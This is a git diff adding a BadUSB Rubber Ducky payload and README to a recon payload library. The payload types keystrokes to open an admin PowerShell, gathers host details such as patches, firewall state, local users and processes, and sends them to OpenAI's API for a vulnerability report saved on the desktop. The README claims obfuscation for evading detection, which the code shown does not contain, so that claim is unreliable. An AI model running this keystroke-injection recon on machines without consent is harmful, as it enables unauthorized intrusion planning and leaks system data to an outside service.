Merge 009d089d5c into 6ae414c545

2024-11-02 17:18:00 -04:00 · 2024-11-02 17:18:00 -04:00 · f98d4c6bf8
parent 6ae414c545 009d089d5c
commit f98d4c6bf8
2 changed files with 152 additions and 0 deletions
--- a/payloads/library/recon/PentestGPT/PentestGPT.txt
+++ b/payloads/library/recon/PentestGPT/PentestGPT.txt
@ -0,0 +1,128 @@
+REM Author: ooovenenoso
+REM Open PowerShell
+DELAY 500
+GUI x
+DELAY 2000
+STRING a
+DELAY 2000
+LEFTARROW
+DELAY 2000
+ENTER
+REM Create PowerShell script to gather system information
+DELAY 500
+STRING $system_info = @{
+ENTER
+DELAY 500
+STRING 'OS' = $(Get-CimInstance Win32_OperatingSystem).Caption;
+ENTER
+DELAY 500
+STRING 'Version' = $(Get-CimInstance Win32_OperatingSystem).Version;
+ENTER
+DELAY 500
+STRING 'Architecture' = $(Get-CimInstance Win32_OperatingSystem).OSArchitecture;
+ENTER
+DELAY 500
+STRING 'ComputerName' = $(Get-CimInstance Win32_OperatingSystem).CSName;
+ENTER
+DELAY 500
+STRING 'LastBootTime' = $(Get-CimInstance Win32_OperatingSystem).LastBootUpTime;
+ENTER
+DELAY 500
+STRING 'InstalledUpdates' = $(Get-HotFix | Sort-Object -Property InstalledOn -Descending | Select-Object -First 5).Description;
+ENTER
+DELAY 500
+STRING 'NetworkInfo' = $(Get-CimInstance Win32_NetworkAdapterConfiguration | Where-Object {$_.IPEnabled -eq $true}).IPAddress;
+ENTER
+DELAY 500
+STRING 'FirewallStatus' = $(Get-NetFirewallProfile | Where-Object { $_.Enabled -eq $true }).Name;
+ENTER
+DELAY 500
+STRING 'UserAccounts' = $(Get-LocalUser | Where-Object { $_.Enabled -eq $true }).Name;
+ENTER
+DELAY 500
+STRING 'RunningProcesses' = $(Get-Process | Sort-Object -Property CPU -Descending | Select-Object -First 5).Name;
+ENTER
+DELAY 500
+STRING }
+ENTER
+
+REM Requesting GPT to format response in HTML
+DELAY 500
+STRING $prompt_text = "Given the detailed system information: OS: $($system_info.OS), Version: $($system_info.Version), Architecture: $($system_info.Architecture), Computer Name: COMPUTER_NAME_PLACEHOLDER, Last Boot Time: $($system_info.LastBootTime), Installed Updates: $($system_info.InstalledUpdates), Network Info: NETWORK_INFO_PLACEHOLDER, Firewall Status: $($system_info.FirewallStatus), User Accounts: USER_ACCOUNTS_PLACEHOLDER, Running Processes: $($system_info.RunningProcesses), provide a pentesting report identifying potential vulnerabilities in English, formatted in HTML with headers and bullet points for recommendations."
+ENTER
+DELAY 500
+STRING $messages = @(
+ENTER
+DELAY 1000
+STRING @{ 'role' = 'system'; 'content' = 'You are analyzing detailed system information for potential vulnerabilities.' },
+ENTER
+DELAY 1000
+STRING @{ 'role' = 'user'; 'content' = $prompt_text }
+ENTER
+DELAY 1000
+STRING )
+ENTER
+DELAY 500
+STRING $headers = @{ 'Authorization' = 'Bearer YOUR_OPENAI_API_KEY'; 'Content-Type' = 'application/json' }
+ENTER
+DELAY 500
+STRING $response = Invoke-RestMethod -Uri 'https://api.openai.com/v1/chat/completions' -Method POST -Headers $headers -Body (@{ model = 'gpt-3.5-turbo'; messages = $messages } | ConvertTo-Json)
+ENTER
+DELAY 500
+STRING $htmlContent = @"
+ENTER
+DELAY 500
+STRING <html>
+ENTER
+DELAY 500
+STRING <head>
+ENTER
+DELAY 500
+STRING <title>Pentesting Report BadUSB-GPT</title>
+ENTER
+DELAY 500
+STRING <style>
+ENTER
+DELAY 500
+STRING body {font-family: Arial, sans-serif; margin: 40px;}
+ENTER
+DELAY 500
+STRING h2 {color: #333; border-bottom: 2px solid #eee; padding-bottom: 10px;}
+ENTER
+DELAY 500
+STRING h3 {color: #555; margin-top: 20px;}
+ENTER
+DELAY 500
+STRING p, ul {margin-bottom: 20px;}
+ENTER
+DELAY 500
+STRING </style>
+ENTER
+DELAY 500
+STRING </head>
+ENTER
+DELAY 500
+STRING <body>
+ENTER
+DELAY 500
+STRING <h2>Pentesting Report</h2>
+ENTER
+DELAY 500
+STRING $($response.choices[0].message.content)
+ENTER
+DELAY 500
+STRING </body>
+ENTER
+DELAY 500
+STRING </html>
+ENTER
+DELAY 500
+STRING "@
+ENTER
+DELAY 500
+STRING Set-Content -Path $env:USERPROFILE\Desktop\Pentesting_Report.html -Value $htmlContent
+ENTER
+REM Replacing placeholders with actual values in the local report
+DELAY 500
+STRING (Get-Content $env:USERPROFILE\Desktop\Pentesting_Report.html).Replace('COMPUTER_NAME_PLACEHOLDER', $system_info.ComputerName).Replace('NETWORK_INFO_PLACEHOLDER', ($system_info.NetworkInfo -join ', ')).Replace('USER_ACCOUNTS_PLACEHOLDER', ($system_info.UserAccounts -join ', ')) | Set-Content $env:USERPROFILE\Desktop\Pentesting_Report.html
+ENTER
--- a/payloads/library/recon/PentestGPT/README.md
+++ b/payloads/library/recon/PentestGPT/README.md
@ -0,0 +1,24 @@
+# Rubber Ducky Meets OpenAI's GPT
+
+![BadUSB x GPT](https://github.com/ooovenenoso/BadUSB-GPT/blob/main/banner.png)
+
+## Description
+This script automates the gathering of detailed system information and uses the OpenAI GPT-3.5 Turbo API to generate a pentesting report based on the collected information. Additionally, the script showcases an example of obfuscation to protect sensitive parts of the code and to evade basic detection mechanisms.
+
+## Features
+- Gathers system information, including OS, version, architecture, computer name, last boot time, installed updates, network info, firewall status, user accounts, and running processes.
+- Formats the collected information into a request for GPT-3.5 Turbo.
+- Generates a pentesting report in HTML based on the response from GPT-3.5 Turbo.
+- Demonstrates basic code obfuscation techniques.
+- Saves the report on the user's desktop.
+
+## Usage
+1. Ensure you have PowerShell and access to the OpenAI API.
+2. Run the script.
+3. Check the generated report on the user's desktop.
+
+## Disclaimer
+This script is intended for educational and demonstration purposes only. Do not use it on live systems without proper permission.
+
+## Author
+- ooovenenoso